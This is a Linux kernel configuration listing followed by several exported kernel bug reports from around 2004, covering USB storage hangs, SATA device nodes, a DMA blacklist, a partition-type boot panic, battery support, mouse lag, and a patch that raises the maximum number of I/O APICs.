CONFIG_IP_NF_MATCH_AH_ESP=y CONFIG_IP_NF_MATCH_LENGTH=y CONFIG_IP_NF_MATCH_TTL=y CONFIG_IP_NF_MATCH_TCPMSS=y CONFIG_IP_NF_MATCH_HELPER=y CONFIG_IP_NF_MATCH_STATE=y CONFIG_IP_NF_MATCH_CONNTRACK=y CONFIG_IP_NF_MATCH_OWNER=y # CONFIG_IP_NF_MATCH_ADDRTYPE is not set # CONFIG_IP_NF_MATCH_REALM is not set # CONFIG_IP_NF_MATCH_SCTP is not set # CONFIG_IP_NF_MATCH_COMMENT is not set # CONFIG_IP_NF_MATCH_HASHLIMIT is not set CONFIG_IP_NF_FILTER=y CONFIG_IP_NF_TARGET_REJECT=y CONFIG_IP_NF_TARGET_LOG=y CONFIG_IP_NF_TARGET_ULOG=y CONFIG_IP_NF_TARGET_TCPMSS=y CONFIG_IP_NF_NAT=y CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=y CONFIG_IP_NF_TARGET_REDIRECT=y CONFIG_IP_NF_TARGET_NETMAP=y CONFIG_IP_NF_TARGET_SAME=y # CONFIG_IP_NF_NAT_LOCAL is not set CONFIG_IP_NF_NAT_SNMP_BASIC=y CONFIG_IP_NF_NAT_IRC=y CONFIG_IP_NF_NAT_FTP=y CONFIG_IP_NF_NAT_TFTP=y CONFIG_IP_NF_NAT_AMANDA=y CONFIG_IP_NF_MANGLE=y CONFIG_IP_NF_TARGET_TOS=y CONFIG_IP_NF_TARGET_ECN=y CONFIG_IP_NF_TARGET_DSCP=y CONFIG_IP_NF_TARGET_MARK=y CONFIG_IP_NF_TARGET_CLASSIFY=y # CONFIG_IP_NF_RAW is not set CONFIG_IP_NF_ARPTABLES=y CONFIG_IP_NF_ARPFILTER=y CONFIG_IP_NF_ARP_MANGLE=y CONFIG_XFRM=y CONFIG_XFRM_USER=y # # SCTP Configuration (EXPERIMENTAL) # # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_BRIDGE is not set # CONFIG_VLAN_8021Q is not set # CONFIG_DECNET is not set CONFIG_LLC=y # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # CONFIG_NET_CLS_ROUTE is not set # # Network testing # # CONFIG_NET_PKTGEN is not set CONFIG_NETPOLL=y CONFIG_NETPOLL_RX=y CONFIG_NETPOLL_TRAP=y CONFIG_NET_POLL_CONTROLLER=y # CONFIG_HAMRADIO is not set # CONFIG_IRDA is not set # CONFIG_BT is not set CONFIG_NETDEVICES=y CONFIG_DUMMY=y CONFIG_BONDING=y # CONFIG_EQUALIZER is not set CONFIG_TUN=y # # ARCnet devices # # CONFIG_ARCNET is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y CONFIG_MII=y # CONFIG_HAPPYMEAL is not set CONFIG_SUNGEM=y # CONFIG_NET_VENDOR_3COM is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set # CONFIG_IBMVETH is not set CONFIG_NET_PCI=y CONFIG_PCNET32=y # CONFIG_AMD8111_ETH is not set # CONFIG_ADAPTEC_STARFIRE is not set # CONFIG_B44 is not set # CONFIG_FORCEDETH is not set # CONFIG_DGRS is not set # CONFIG_EEPRO100 is not set # CONFIG_E100 is not set # CONFIG_FEALNX is not set # CONFIG_NATSEMI is not set # CONFIG_NE2K_PCI is not set # CONFIG_8139CP is not set # CONFIG_8139TOO is not set # CONFIG_SIS900 is not set # CONFIG_EPIC100 is not set # CONFIG_SUNDANCE is not set # CONFIG_VIA_RHINE is not set # CONFIG_VIA_VELOCITY is not set # # Ethernet (1000 Mbit) # CONFIG_ACENIC=y CONFIG_ACENIC_OMIT_TIGON_I=y # CONFIG_DL2K is not set CONFIG_E1000=y # CONFIG_E1000_NAPI is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SK98LIN is not set CONFIG_TIGON3=y # # Ethernet (10000 Mbit) # CONFIG_IXGB=y # CONFIG_IXGB_NAPI is not set # CONFIG_S2IO is not set # # Token Ring devices # CONFIG_TR=y CONFIG_IBMOL=y # CONFIG_3C359 is not set # CONFIG_TMS380TR is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Wan interfaces # # CONFIG_WAN is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set CONFIG_PPP=y # CONFIG_PPP_MULTILINK is not set # CONFIG_PPP_FILTER is not set CONFIG_PPP_ASYNC=y CONFIG_PPP_SYNC_TTY=y CONFIG_PPP_DEFLATE=y CONFIG_PPP_BSDCOMP=y CONFIG_PPPOE=y # CONFIG_SLIP is not set # CONFIG_NET_FC is not set # CONFIG_SHAPER is not set CONFIG_NETCONSOLE=y # # ISDN subsystem # # CONFIG_ISDN is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # # CONFIG_GAMEPORT is not set CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y # CONFIG_SERIO_SERPORT is not set # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PCIPS2 is not set # CONFIG_SERIO_RAW is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_LKKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y # CONFIG_MOUSE_SERIAL is not set # CONFIG_MOUSE_VSXXXAA is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set CONFIG_INPUT_MISC=y CONFIG_INPUT_PCSPKR=y # CONFIG_INPUT_UINPUT is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y CONFIG_SERIAL_8250_CONSOLE=y CONFIG_SERIAL_8250_NR_UARTS=4 # CONFIG_SERIAL_8250_EXTENDED is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y CONFIG_SERIAL_CORE_CONSOLE=y # CONFIG_SERIAL_PMACZILOG is not set # CONFIG_SERIAL_ICOM is not set CONFIG_UNIX98_PTYS=y CONFIG_LEGACY_PTYS=y CONFIG_LEGACY_PTY_COUNT=256 CONFIG_HVC_CONSOLE=y # CONFIG_HVCS is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set CONFIG_RTC=y # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # # Ftape, the floppy tape device driver # # CONFIG_AGP is not set # CONFIG_DRM is not set CONFIG_RAW_DRIVER=y CONFIG_MAX_RAW_DEVS=256 # # I2C support # CONFIG_I2C=y # CONFIG_I2C_CHARDEV is not set # # I2C Algorithms # CONFIG_I2C_ALGOBIT=y # CONFIG_I2C_ALGOPCF is not set # CONFIG_I2C_ALGOPCA is not set # # I2C Hardware Bus support # # CONFIG_I2C_ALI1535 is not set # CONFIG_I2C_ALI1563 is not set # CONFIG_I2C_ALI15X3 is not set # CONFIG_I2C_AMD756 is not set # CONFIG_I2C_AMD8111 is not set # CONFIG_I2C_I801 is not set # CONFIG_I2C_I810 is not set # CONFIG_I2C_ISA is not set # CONFIG_I2C_NFORCE2 is not set # CONFIG_I2C_PARPORT_LIGHT is not set # CONFIG_I2C_PROSAVAGE is not set # CONFIG_I2C_SAVAGE4 is not set # CONFIG_SCx200_ACB is not set # CONFIG_I2C_SIS5595 is not set # CONFIG_I2C_SIS630 is not set # CONFIG_I2C_SIS96X is not set # CONFIG_I2C_VIA is not set # CONFIG_I2C_VIAPRO is not set # CONFIG_I2C_VOODOO3 is not set # CONFIG_I2C_PCA_ISA is not set # # Hardware Sensors Chip support # # CONFIG_I2C_SENSOR is not set # CONFIG_SENSORS_ADM1021 is not set # CONFIG_SENSORS_ADM1025 is not set # CONFIG_SENSORS_ADM1031 is not set # CONFIG_SENSORS_ASB100 is not set # CONFIG_SENSORS_DS1621 is not set # CONFIG_SENSORS_FSCHER is not set # CONFIG_SENSORS_GL518SM is not set # CONFIG_SENSORS_IT87 is not set # CONFIG_SENSORS_LM75 is not set # CONFIG_SENSORS_LM77 is not set # CONFIG_SENSORS_LM78 is not set # CONFIG_SENSORS_LM80 is not set # CONFIG_SENSORS_LM83 is not set # CONFIG_SENSORS_LM85 is not set # CONFIG_SENSORS_LM87 is not set # CONFIG_SENSORS_LM90 is not set # CONFIG_SENSORS_MAX1619 is not set # CONFIG_SENSORS_SMSC47M1 is not set # CONFIG_SENSORS_VIA686A is not set # CONFIG_SENSORS_W83781D is not set # CONFIG_SENSORS_W83L785TS is not set # CONFIG_SENSORS_W83627HF is not set # # Other I2C Chip support # # CONFIG_SENSORS_EEPROM is not set # CONFIG_SENSORS_PCF8574 is not set # CONFIG_SENSORS_PCF8591 is not set # CONFIG_SENSORS_RTC8564 is not set # CONFIG_I2C_DEBUG_CORE is not set # CONFIG_I2C_DEBUG_ALGO is not set # CONFIG_I2C_DEBUG_BUS is not set # CONFIG_I2C_DEBUG_CHIP is not set # # Dallas's 1-wire bus # # CONFIG_W1 is not set # # Misc devices # # # Multimedia devices # # CONFIG_VIDEO_DEV is not set # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # # Graphics support # CONFIG_FB=y CONFIG_FB_MODE_HELPERS=y # CONFIG_FB_TILEBLITTING is not set # CONFIG_FB_CIRRUS is not set # CONFIG_FB_PM2 is not set # CONFIG_FB_CYBER2000 is not set CONFIG_FB_OF=y # CONFIG_FB_CT65550 is not set # CONFIG_FB_ASILIANT is not set # CONFIG_FB_IMSTT is not set # CONFIG_FB_VGA16 is not set # CONFIG_FB_RIVA is not set CONFIG_FB_MATROX=y CONFIG_FB_MATROX_MILLENIUM=y CONFIG_FB_MATROX_MYSTIQUE=y CONFIG_FB_MATROX_G450=y CONFIG_FB_MATROX_G100=y # CONFIG_FB_MATROX_I2C is not set CONFIG_FB_MATROX_MULTIHEAD=y # CONFIG_FB_RADEON_OLD is not set CONFIG_FB_RADEON=y CONFIG_FB_RADEON_I2C=y # CONFIG_FB_RADEON_DEBUG is not set # CONFIG_FB_ATY128 is not set # CONFIG_FB_ATY is not set # CONFIG_FB_SIS is not set # CONFIG_FB_NEOMAGIC is not set # CONFIG_FB_KYRO is not set # CONFIG_FB_3DFX is not set # CONFIG_FB_VOODOO1 is not set # CONFIG_FB_TRIDENT is not set # CONFIG_FB_VIRTUAL is not set # # Console display driver support # # CONFIG_VGA_CONSOLE is not set CONFIG_DUMMY_CONSOLE=y CONFIG_FRAMEBUFFER_CONSOLE=y # CONFIG_FONTS is not set CONFIG_FONT_8x8=y CONFIG_FONT_8x16=y # # Logo configuration # CONFIG_LOGO=y CONFIG_LOGO_LINUX_MONO=y CONFIG_LOGO_LINUX_VGA16=y CONFIG_LOGO_LINUX_CLUT224=y # # Sound # # CONFIG_SOUND is not set # # USB support # CONFIG_USB=y # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y # CONFIG_USB_BANDWIDTH is not set # CONFIG_USB_DYNAMIC_MINORS is not set # CONFIG_USB_OTG is not set # # USB Host Controller Drivers # CONFIG_USB_EHCI_HCD=y # CONFIG_USB_EHCI_SPLIT_ISO is not set # CONFIG_USB_EHCI_ROOT_HUB_TT is not set CONFIG_USB_OHCI_HCD=y # CONFIG_USB_UHCI_HCD is not set # # USB Device Class drivers # # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set CONFIG_USB_STORAGE=y # CONFIG_USB_STORAGE_DEBUG is not set # CONFIG_USB_STORAGE_RW_DETECT is not set # CONFIG_USB_STORAGE_DATAFAB is not set # CONFIG_USB_STORAGE_FREECOM is not set # CONFIG_USB_STORAGE_ISD200 is not set # CONFIG_USB_STORAGE_DPCM is not set # CONFIG_USB_STORAGE_HP8200e is not set # CONFIG_USB_STORAGE_SDDR09 is not set # CONFIG_USB_STORAGE_SDDR55 is not set # CONFIG_USB_STORAGE_JUMPSHOT is not set # # USB Human Interface Devices (HID) # CONFIG_USB_HID=y CONFIG_USB_HIDINPUT=y # CONFIG_HID_FF is not set CONFIG_USB_HIDDEV=y # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_MTOUCH is not set # CONFIG_USB_EGALAX is not set # CONFIG_USB_XPAD is not set # CONFIG_USB_ATI_REMOTE is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_MICROTEK is not set # CONFIG_USB_HPUSBSCSI is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # # Video4Linux support is needed for USB Multimedia device support # # # USB Network adaptors # # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_EMI62 is not set # CONFIG_USB_EMI26 is not set # CONFIG_USB_TIGL is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_LEGOTOWER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_LED is not set # CONFIG_USB_CYTHERM is not set # CONFIG_USB_PHIDGETSERVO is not set # CONFIG_USB_TEST is not set # # USB ATM/DSL drivers # # # USB Gadget Support # # CONFIG_USB_GADGET is not set # # File systems # CONFIG_EXT2_FS=y CONFIG_EXT2_FS_XATTR=y CONFIG_EXT2_FS_POSIX_ACL=y # CONFIG_EXT2_FS_SECURITY is not set CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y CONFIG_EXT3_FS_POSIX_ACL=y # CONFIG_EXT3_FS_SECURITY is not set CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set CONFIG_FS_MBCACHE=y # CONFIG_REISERFS_FS is not set # CONFIG_JFS_FS is not set CONFIG_FS_POSIX_ACL=y # CONFIG_XFS_FS is not set # CONFIG_MINIX_FS is not set # CONFIG_ROMFS_FS is not set # CONFIG_QUOTA is not set CONFIG_AUTOFS_FS=y # CONFIG_AUTOFS4_FS is not set # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=y # CONFIG_JOLIET is not set # CONFIG_ZISOFS is not set CONFIG_UDF_FS=y CONFIG_UDF_NLS=y # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y CONFIG_VFAT_FS=y CONFIG_FAT_DEFAULT_CODEPAGE=437 CONFIG_FAT_DEFAULT_IOCHARSET="iso8859-1" # CONFIG_NTFS_FS is not set # # Pseudo filesystems # CONFIG_PROC_FS=y CONFIG_PROC_KCORE=y CONFIG_SYSFS=y CONFIG_DEVFS_FS=y # CONFIG_DEVFS_MOUNT is not set # CONFIG_DEVFS_DEBUG is not set CONFIG_DEVPTS_FS_XATTR=y # CONFIG_DEVPTS_FS_SECURITY is not set CONFIG_TMPFS=y # CONFIG_TMPFS_XATTR is not set CONFIG_HUGETLBFS=y CONFIG_HUGETLB_PAGE=y CONFIG_RAMFS=y # # Miscellaneous filesystems # # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_HFSPLUS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EFS_FS is not set CONFIG_CRAMFS=y # CONFIG_VXFS_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # # Network File Systems # # CONFIG_NFS_FS is not set # CONFIG_NFSD is not set # CONFIG_EXPORTFS is not set # CONFIG_SMB_FS is not set # CONFIG_CIFS is not set # CONFIG_NCP_FS is not set # CONFIG_CODA_FS is not set # CONFIG_AFS_FS is not set # # Partition Types # # CONFIG_PARTITION_ADVANCED is not set CONFIG_MSDOS_PARTITION=y # # Native Language Support # CONFIG_NLS=y CONFIG_NLS_DEFAULT="iso8859-1" # CONFIG_NLS_CODEPAGE_437 is not set # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set # CONFIG_NLS_CODEPAGE_850 is not set # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set # CONFIG_NLS_ASCII is not set # CONFIG_NLS_ISO8859_1 is not set # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set # CONFIG_NLS_ISO8859_15 is not set # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set # CONFIG_NLS_UTF8 is not set # # Profiling support # CONFIG_PROFILING=y CONFIG_OPROFILE=y # # Kernel hacking # CONFIG_DEBUG_KERNEL=y CONFIG_MAGIC_SYSRQ=y # CONFIG_SCHEDSTATS is not set # CONFIG_DEBUG_SLAB is not set # CONFIG_DEBUG_SPINLOCK_SLEEP is not set # CONFIG_DEBUG_INFO is not set CONFIG_DEBUG_STACKOVERFLOW=y CONFIG_DEBUG_STACK_USAGE=y CONFIG_DEBUGGER=y CONFIG_XMON=y CONFIG_XMON_DEFAULT=y # CONFIG_PPCDBG is not set # CONFIG_IRQSTACKS is not set # # CONFIG_KEYS is not set # CONFIG_SECURITY is not set # # Cryptographic options # CONFIG_CRYPTO=y CONFIG_CRYPTO_HMAC=y # CONFIG_CRYPTO_NULL is not set # CONFIG_CRYPTO_MD4 is not set CONFIG_CRYPTO_MD5=y CONFIG_CRYPTO_SHA1=y # CONFIG_CRYPTO_SHA256 is not set # CONFIG_CRYPTO_SHA512 is not set # CONFIG_CRYPTO_WP512 is not set CONFIG_CRYPTO_DES=y # CONFIG_CRYPTO_BLOWFISH is not set # CONFIG_CRYPTO_TWOFISH is not set # CONFIG_CRYPTO_SERPENT is not set # CONFIG_CRYPTO_AES is not set # CONFIG_CRYPTO_CAST5 is not set # CONFIG_CRYPTO_CAST6 is not set # CONFIG_CRYPTO_TEA is not set # CONFIG_CRYPTO_ARC4 is not set # CONFIG_CRYPTO_KHAZAD is not set CONFIG_CRYPTO_DEFLATE=y # CONFIG_CRYPTO_MICHAEL_MIC is not set # CONFIG_CRYPTO_CRC32C is not set # CONFIG_CRYPTO_TEST is not set # # Library routines # CONFIG_CRC_CCITT=y CONFIG_CRC32=y # CONFIG_LIBCRC32C is not set CONFIG_ZLIB_INFLATE=y CONFIG_ZLIB_DEFLATE=y</t>
  </si>
  <si>
    <t>Marcin Juszkiewicz</t>
  </si>
  <si>
    <t>Problem with USB 1.1 Storage plugged in USB 2.0</t>
  </si>
  <si>
    <t>2004-11-07 08:39 UTC</t>
  </si>
  <si>
    <t>Jean-Yves LENHOF</t>
  </si>
  <si>
    <t>2005-02-19 08:28 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: Minolta DiMAGE F200 I try to mount as a usb-storage my Minolta DiMAGE F200 (which seems to be USB 1.1) on a kernel 2.6 If I plug it on a USB 2.0 plug, it hangs If I plug it on a USB 1.1 plug, it works With kernel 2.4 (module usb-uhci) it works whatever the plug I use.</t>
  </si>
  <si>
    <t>Paolo 'Blaisorblade' Giarrusso</t>
  </si>
  <si>
    <t>ata_piix not creating devices when compiled into kernel</t>
  </si>
  <si>
    <t>2004-11-10 07:16 UTC</t>
  </si>
  <si>
    <t>Stephen Glow</t>
  </si>
  <si>
    <t>2007-08-08 21:01 UTC</t>
  </si>
  <si>
    <t>Tejun Heo</t>
  </si>
  <si>
    <t>Distribution: Gentoo (2.6.9-gentoo-r1) Hardware Environment: ICH5 IDE controller. 1 IDE drive (booting from) 2 SATA drives Problem Description: I'm booting from the parallel IDE drive on a system which includes two sata drives. I expect udev to create the various /dev/sd* device nodes at startup. This works perfectly when the ata_piix driver is compiled as a module, but not when it's compiled into the kernel. When the ata_piix driver is compiled as a module, all device files are created properly on system startup. I can mount the drives and access them with no problems. When ata_piix is compiled into the kernel, the drives seem to be recognized at startup, but no device files are created. I can see entries for the devices in /sys/class/scsi_host/ and /sys/class/scsi_device/ for them. I don't however get anything under /sys/block. After bootup, if I manually create a device file for one of the disks and then access the disk, all the other device files are created automatically. Here is an example of how I can get the device files to be created after bootup: mknod /dev/sda b 8 0 head /dev/sda &gt; /dev/nul As soon as I do this, the other device files (/dev/sda1, /dev/sdb, /dev/sdb1, etc) are created. Other then the problems with creating the device files, the drives seem to work fine.</t>
  </si>
  <si>
    <t>Christian Iversen</t>
  </si>
  <si>
    <t>DMA blacklist may be incorrect</t>
  </si>
  <si>
    <t>2004-11-10 17:26 UTC</t>
  </si>
  <si>
    <t>2004-12-13 14:01 UTC</t>
  </si>
  <si>
    <t>Hello I have a Plextor PX-W8432T CD-RW drive. When i try to set DMA using via hdparm, i get a message about blacklist from kernel (v 2.6.8). This drive is worked perfetly with DMA from 2001. I have no any problem with it. I have removed this drive from blacklist and recompiled the kernel. Drive still work perfectly with DMA. Much better than without it. I'm view a later versions changelogs and haven't see anything about Plextor. So, i think this problem present in kernels 2.6.9 and 2.6.10 too. So, why this drive present in blacklist ? And related to this problem question - whether there a method to ignore blacklists without kernel recompiling (via /proc or /sys for example) ? I think, it's a very useful feature. PS. Linux 2.6.8, Pentium III 1.2GHz/i815</t>
  </si>
  <si>
    <t>x86_64 unknown partition table with Windows Logical Disk Manger compiled</t>
  </si>
  <si>
    <t>2.6.7, 2.6.8, 2.6.9 x86_64</t>
  </si>
  <si>
    <t>2004-11-11 10:15 UTC</t>
  </si>
  <si>
    <t>Rob Rosenfeld</t>
  </si>
  <si>
    <t>2004-11-19 06:40 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo gentoo-dev-sources 2.6.9-r1 Hardware Environment: I-Will DK8N w/ nForce3 250 Software Environment: see .config attached Problem Description: If I compile the kernel with Windows Logical Disk Manager support, I get a kernel panic on boot. I have not tried other Advanced Partition types. I have tried where my boot drive is PATA, SATA using deprecated support, and SATA using libata. I have not tried on x86. snips from dmesg when boot drive is on SATA using libata. similar messages occur for other scenarios: scsi1 : sata_nv . . . drive details . . . SCSI device sda: . . . more details . . . SCSI device sda: drive cache: write back /dev/scsi/host0/bus0/target0/lun0: unknown partition table . . clipped dmesg . . VFS: Cannot open root device "sda3" or unknown-block(8,3) Please append a correct "root=" boot option Kernel panic: VFS: Unable to mount root fs on sda3 The same issue also seemst to be discussed in http://kerneltrap.org/node/view/970 The bug was first submitted to Gentoo (http://bugs.gentoo.org/show_bug.cgi?id=67597) but they indicate it belongs upstream. Steps to reproduce: 1. in make menuconfig hit Y on File Systems -&gt; Partition Types -&gt; Advanced Partition Selection and Advanced Partition Selection -&gt; Windows Logical Disk Manager (Dynamic Disk) support (NEW) 2. Select AMD-Opteron/Athlon64 under Processor type and features -&gt; Processor family</t>
  </si>
  <si>
    <t>Need smart battery support - Acer travelmate 3202</t>
  </si>
  <si>
    <t>2004-11-11 15:16 UTC</t>
  </si>
  <si>
    <t>Jimmy Baeten</t>
  </si>
  <si>
    <t>2006-07-19 04:48 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: Acer travelmate 2302 Software Environment: / Problem Description: The ACPI module is not retreiving any information on battery power or the ac adapter on my laptop. Steps to reproduce:</t>
  </si>
  <si>
    <t>HID interface to the device Creative Wireless 6000 broken. Mouse jags.</t>
  </si>
  <si>
    <t>&gt;2.6.4</t>
  </si>
  <si>
    <t>2004-11-14 06:53 UTC</t>
  </si>
  <si>
    <t>Tobias Ussing</t>
  </si>
  <si>
    <t>2008-01-03 15:29 UTC</t>
  </si>
  <si>
    <t>Distribution: All Hardware Environment: x86(or all) Software Environment: uhci, ehci, ohci. Problem Description: one description from gentoo forums "You can move the pointer, but it's really really sketchy. The motion isnt very smooth, similar to when your computer is lagging and you move the mouse pointer and it 'stop-starts'." The mouse moves the specified amount, but the pointer between start and stop aren't drawn. Moving from 10,0 to 10,100 will make the mouse move that distance, but few of the positions in between are being drawn. And the mouse reacts with a minor delay. Even office work is hard(selecting a menu option can be a pain). Steps to reproduce: Plug in device. Start gpm or X.</t>
  </si>
  <si>
    <t>Michal Margula</t>
  </si>
  <si>
    <t>2.6.13</t>
  </si>
  <si>
    <t>Max I/O APICs number is insufficient</t>
  </si>
  <si>
    <t>2004-11-16 17:38 UTC</t>
  </si>
  <si>
    <t>2005-07-27 17:44 UTC</t>
  </si>
  <si>
    <t>Distribution: 2.6.9 Hardware Environment: ES7000 ia-32 Software Environment: System initialization Problem Description: New generation of ES7000 x86-64 and ia32 servers will have up to 144 I/O APICs, and it is time to re-consider the low value of 8 for possible I/O APICs for SMP and 32 for NUMA systems in i386 and 32 in x86-64. Other platforms are probably planning on many more I/O APICs in the near future. This is a proposed patch to make the MAX_IO_APICS a configurable value (as Len recommended for this case, to assure flexibility): diff -puN arch/i386/Kconfig~max_ioapics arch/i386/Kconfig --- linux-2.6.9/arch/i386/Kconfig~max_ioapics 2004-10-28 02:15:40.362929560 - 0700 +++ linux-2.6.9-natalie/arch/i386/Kconfig 2004-10-28 02:17:46.479756888 - 0700 @@ -485,6 +485,18 @@ config NR_CPUS This is purely to save memory - each supported CPU adds approximately eight kilobytes to the kernel image. +config MAX_IO_APICS + int "Maximum number of IO-APICs (1-256)" + range 1 256 + depends on X86_IO_APIC + default "32" if X86_NUMAQ || X86_SUMMIT || X86_BIGSMP + default "256" if X86_ES7000 || X86_GENERICARCH + default "8" + help + This option allows to specify the maximum number of I/O interrupt + controllers (IO-APICs). The maximim supported value is 256 and + the minimum is 1. + config SCHED_SMT bool "SMT (Hyperthreading) scheduler support" depends on SMP diff -puN include/asm-i386/apicdef.h~max_ioapics include/asm-i386/apicdef.h --- linux-2.6.9/include/asm-i386/apicdef.h~max_ioapics 2004-10-28 02:15:40.441917552 -0700 +++ linux-2.6.9-natalie/include/asm-i386/apicdef.h 2004-10-28 02:18:18.571878144 -0700 @@ -108,11 +108,7 @@ #define APIC_BASE (fix_to_virt(FIX_APIC_BASE)) -#ifdef CONFIG_NUMA - #define MAX_IO_APICS 32 -#else - #define MAX_IO_APICS 8 -#endif +#define MAX_IO_APICS CONFIG_MAX_IO_APICS /* * the local APIC register structure, memory mapped. Not terribly well diff -puN include/asm-x86_64/apicdef.h~max_ioapics include/asm-x86_64/apicdef.h --- linux-2.6.9/include/asm-x86_64/apicdef.h~max_ioapics 2004-10-28 02:15:40.536903112 -0700 +++ linux-2.6.9-natalie/include/asm-x86_64/apicdef.h 2004-10-28 02:18:48.129384720 -0700 @@ -108,7 +108,7 @@ #define APIC_BASE (fix_to_virt(FIX_APIC_BASE)) -#define MAX_IO_APICS 32 +#define MAX_IO_APICS CONFIG_MAX_IO_APICS /* * the local APIC register structure, memory mapped. Not terribly well diff -puN include/asm-x86_64/apicdef.h~max_ioapics include/asm-x86_64/apicdef.h --- linux-2.6.9/include/asm-x86_64/apicdef.h~max_ioapics 2004-10-28 02:15:40.000000000 -0700 +++ linux-2.6.9-root/include/asm-x86_64/apicdef.h 2004-10-28 02:18:48.000000000 -0700 @@ -108,7 +108,7 @@ #define APIC_BASE (fix_to_virt(FIX_APIC_BASE)) -#define MAX_IO_APICS 32 +#define MAX_IO_APICS CONFIG_MAX_IO_APICS /* * the local APIC register structure, memory mapped. Not terribly well diff -puN arch/x86_64/Kconfig~max_ioapics arch/x86_64/Kconfig --- linux-2.6.9/arch/x86_64/Kconfig~max_ioapics 2004-11-16 11:24:38.256336128 - 0800 +++ linux-2.6.9-root/arch/x86_64/Kconfig 2004-11-16 